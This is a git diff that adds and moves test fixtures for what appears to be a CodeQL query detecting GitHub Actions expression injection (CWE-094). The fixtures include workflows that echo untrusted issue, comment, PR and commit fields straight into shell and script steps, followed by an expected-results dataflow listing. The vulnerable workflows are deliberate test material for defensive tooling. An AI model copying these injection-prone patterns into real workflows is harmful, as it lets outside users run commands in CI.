a/ql/src/test/composite-actions/action.yml b/ql/test/query-tests/Security/CWE-020/action1/action.yml similarity index 99% rename from ql/src/test/composite-actions/action.yml rename to ql/test/query-tests/Security/CWE-020/action1/action.yml index c43d5fd6694..787fb9f588b 100644 --- a/ql/src/test/composite-actions/action.yml +++ b/ql/test/query-tests/Security/CWE-020/action1/action.yml @@ -48,3 +48,4 @@ runs: TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + diff --git a/ql/src/test/.github/workflows/argus_case_study.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml similarity index 100% rename from ql/src/test/.github/workflows/argus_case_study.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml diff --git a/ql/src/test/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml similarity index 100% rename from ql/src/test/.github/workflows/changed-files.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml new file mode 100644 index 00000000000..17ead9fdd20 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml @@ -0,0 +1,28 @@ +on: issue_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' + + echo-chamber2: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.comment.body }}' + - run: echo '${{ github.event.issue.body }}' + - run: echo '${{ github.event.issue.title }}' + + echo-chamber3: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v3 + with: + script: console.log('${{ github.event.comment.body }}') + - uses: actions/github-script@v3 + with: + script: console.log('${{ github.event.issue.body }}') + - uses: actions/github-script@v3 + with: + script: console.log('${{ github.event.issue.title }}') \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml new file mode 100644 index 00000000000..0a64e47f6cb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml @@ -0,0 +1,10 @@ +on: issue_comment + +# same as comment_issue but this file ends with a line break + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml similarity index 100% rename from ql/src/test/.github/workflows/cross1.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml similarity index 100% rename from ql/src/test/.github/workflows/cross2.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml similarity index 100% rename from ql/src/test/.github/workflows/cross3.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml new file mode 100644 index 00000000000..fdb140ec380 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -0,0 +1,8 @@ +on: discussion + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml new file mode 100644 index 00000000000..649d3a6e131 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml @@ -0,0 +1,9 @@ +on: discussion_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' + - run: echo '${{ github.event.comment.body }}' \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml new file mode 100644 index 00000000000..a952c8c1ab8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml @@ -0,0 +1,11 @@ +on: gollum + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pages[1].title }}' + - run: echo '${{ github.event.pages[11].title }}' + - run: echo '${{ github.event.pages[0].page_name }}' + - run: echo '${{ github.event.pages[2222].page_name }}' + - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe \ No newline at end of file diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml similarity index 100% rename from ql/src/test/.github/workflows/image_link_generator.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml diff --git a/ql/src/test/.github/workflows/inter-job.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml similarity index 100% rename from ql/src/test/.github/workflows/inter-job.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml new file mode 100644 index 00000000000..5e767ce0239 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml @@ -0,0 +1,20 @@ +on: issues + +env: + global_env: ${{ github.event.issue.title }} + test: test + +jobs: + echo-chamber: + env: + job_env: ${{ github.event.issue.title }} + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.issue.title }}' + - run: echo '${{ github.event.issue.body }}' + - run: echo '${{ env.global_env }}' + - run: echo '${{ env.test }}' + - run: echo '${{ env.job_env }}' + - run: echo '${{ env.step_env }}' + env: + step_env: ${{ github.event.issue.title }} diff --git a/ql/src/test/.github/workflows/matrix.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml similarity index 100% rename from ql/src/test/.github/workflows/matrix.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml diff --git a/ql/src/test/.github/workflows/no-flow1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml similarity index 100% rename from ql/src/test/.github/workflows/no-flow1.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml diff --git a/ql/src/test/.github/workflows/no-flow2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml similarity index 100% rename from ql/src/test/.github/workflows/no-flow2.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml new file mode 100644 index 00000000000..d4ce7885669 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml @@ -0,0 +1,14 @@ +on: pull_request_review + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.review.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml new file mode 100644 index 00000000000..5d288caad85 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml @@ -0,0 +1,14 @@ +on: pull_request_review_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.comment.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml new file mode 100644 index 00000000000..215b3252885 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -0,0 +1,16 @@ +on: pull_request_target + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.issue.title }}' # not defined + - run: echo '${{ github.event.issue.body }}' # not defined + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.head_ref }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml new file mode 100644 index 00000000000..2006a7999da --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml @@ -0,0 +1,16 @@ +on: push + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.commits[11].message }}' + - run: echo '${{ github.event.commits[11].author.email }}' + - run: echo '${{ github.event.commits[11].author.name }}' + - run: echo '${{ github.event.head_commit.message }}' + - run: echo '${{ github.event.head_commit.author.email }}' + - run: echo '${{ github.event.head_commit.author.name }}' + - run: echo '${{ github.event.head_commit.committer.email }}' + - run: echo '${{ github.event.head_commit.committer.name }}' + - run: echo '${{ github.event.commits[11].committer.email }}' + - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file diff --git a/ql/src/test/.github/workflows/simple1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml similarity index 100% rename from ql/src/test/.github/workflows/simple1.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml similarity index 100% rename from ql/src/test/.github/workflows/simple2.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml diff --git a/ql/src/test/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml similarity index 100% rename from ql/src/test/.github/workflows/test.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml new file mode 100644 index 00000000000..60e7645f60f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml @@ -0,0 +1,16 @@ +on: + workflow_run: + workflows: [test] + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.workflow_run.display_title }}' + - run: echo '${{ github.event.workflow_run.head_commit.message }}' + - run: echo '${{ github.event.workflow_run.head_commit.author.email }}' + - run: echo '${{ github.event.workflow_run.head_commit.author.name }}' + - run: echo '${{ github.event.workflow_run.head_commit.committer.email }}' + - run: echo '${{ github.event.workflow_run.head_commit.committer.name }}' + - run: echo '${{ github.event.workflow_run.head_branch }}' + - run: echo '${{ github.event.workflow_run.head_repository.description }}' diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected new file mode 100644 index 00000000000..55075b7baf3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -0,0 +1,227 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo 